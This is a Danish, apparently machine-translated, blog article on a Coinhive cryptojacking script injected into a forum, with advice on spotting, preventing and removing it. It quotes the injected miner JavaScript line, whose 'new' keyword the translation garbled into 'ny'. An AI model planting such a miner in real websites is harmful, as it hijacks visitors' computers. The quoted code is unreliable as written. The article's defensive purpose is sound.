Sådan fjerner du Coinhive krypto-mining script fra din hjemmeside

Jeg besøger normalt forummet hver dag, og jeg havde ikke set det dagen før. Så jeg går ud fra, at dette var sket nogen gang om natten, min tid, da jeg sov.

Jeg bruger vBulletin-software til forummet, og det blev opdateret til den nyeste version. Desuden var det helt overraskende for os, da TheWindowsClub.com-domænet bruger Sucuri Web Antivirus & Firewall for at beskytte sig mod onlinetjenester og angreb på internettet.

Min pc-sikkerhedssoftware stoppede med succes det skadelige script fra at køre på min Windows 10-computer. Jeg har tjekket med andre browsere som Chrome & Edge, og resultaterne var de samme.

Efter at højreklikket på forumets webside og kontrolleret kildekoden fandt jeg, at det var et CryptoMiner skadeligt script af CoinHive.

Dette er den ondsindede Coinhive Javascript, som var kommet ind i mit forum kode:

var miner = ny CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

Uanset hvad var det første, jeg gjorde, at tage forum ned og informere Sucuri.

Sucuri folkene rydde forumet for Coinhive scriptet, som var blevet skubbet ind på mit forum om et par timer, og alt var fint.

Hvad er CoinHive

Coinhive tilbud en JavaScript-minearbejder til Monero-kryptokurrency, som du kan integrere i dit website og bruge CPu`en til websitebesøgsdatamaskiner til mine mønter til dig.

Dette kaldes Cryptojacking . Det indebærer kapning af brugernes browsere til cryptocurrency minedrift. Nogle webstedsejere kan bruge det selv til at tjene penge - men i vores tilfælde er det blevet injiceret.

Når en bruger får adgang til det inficerede websted, udfører Coinhive JavaScript og miner Monero ved hjælp af brugerens CPU-ressourcer. Dette kan medføre, at CPU-spænding og uventet systemkrasning af offerets maskine.

Nu hvis din browser er inficeret, vil du se din ressourceudnyttelse gå op. Luk browseren, og den vil falde. Brugeren opdager muligvis, at hans maskine opvarmes, ventilatoren kører hurtigt, eller batteriet dræner hurtigt.

Jeg spurgte min kollega Saurabh Mukhekar at besøge mit forum ved at bruge hans Mac og se, hvad der skete. Nå, hans Mac-computer blev også berørt, da han åbnede forummet med Safari! Han er en af ​​de smarte Mac OSX brugere, der bruger en antivirus software til sin Mac. Hans Avast-antivirus til Mac stoppede med succes det ondsindede script fra at køre.

Said Saurabh,

CoinHive malware kapsler ikke blot en Windows-pc, men også Mac`en, da det er browserbaseret Javascript-infektion. Det er godt, jeg tror ikke i myten, at Mac`er ikke har brug for et antivirusprogram, ellers ville min maskine være blevet smittet, og min Mac ville have fortsat med at churn out mønter til en anden.

Forhindre CoinHive i at inficere dit websted

1. Brug ikke NULL skabeloner eller plugins på din hjemmeside / forum.
2. Hold dit CMS opdateret til den nyeste version.
3. Opdater din hosting software regelmæssigt (PHP, Database osv.).
4. Sikre dit websted med websikkerhedsudbydere som Sucuri, Cloudflare, Wordfence osv.
5. Tag grundlæggende forholdsregler for at sikre din blog.

CoinHive minearbejder fjernelse fra hjemmesiden

Først og fremmest skal du være webmaster for inficeret hjemmeside - eller har administrative legitimationsoplysninger, der giver dig adgang til alle webstedsfilerne.

Når dit antivirus registrerer CoinHive-infektionen, skal du højreklikke på websiden og vælge Vis kildekode. Tryk derefter på Ctrl + F og søg efter "CoinHive".

Når du har identificeret placeringen af ​​den ondsindede kode, skal du se sin position - hvor er den placeret. Nu skal du fjerne det manuelt. For at gøre dette har du brug for en smule kodende viden om din platform. Du bliver nødt til at lokalisere den inficerede fil / s og manuelt fjerne ovenstående script fra det. Hvis du ikke er sikker på det, så spørg nogle eksperter om at gøre det. Da vi bruger Sucuri, lader vi dem gøre det.

Når du har gjort det, skal du rydde din server og browser cache. Hvis du bruger et cache-plugin eller siger MaxCDN, skal du også rydde disse caches.

Beskyt dig selv mod krypto mining scripts

Cryptocurrencies & Blockchain-teknologi overtager verden. Det skaber en indflydelse på den globale økonomi og forårsager også teknologiske forstyrrelser. Alle er begyndt at fokusere på et sådant lukrativt marked - og det omfatter også hackere på hjemmesiden. Når afkastet stiger, bør vi forvente, at sådanne teknologier vil blive misbrugt. Det er den mørke side af enhver ny teknologi.

Hvad vi kan gøre er at tage de bedst mulige forholdsregler til enhver tid. Bortset fra at bruge en god sikkerhedssoftware, brug en Chrome- eller Firefox-udvidelse, der blokerer websites for at bruge din CPU til at min Cryptocurrency - eller brug stadig Anti-WebMiner, der stopper Cryptojacking Mining Script-angreb ved at ændre din værtsfil. Det virker på alle browsere. Hvis du er en Mac-bruger, skal du også have et antivirusprogram til din computer.

Hvis du nogensinde føler, at du måske har besøgt et inficeret websted, er det en god ide at slette din browser cache og scan din maskine med dit antivirusprogram samt AdwCleaner.

Bliv sikker, hold dig vågen!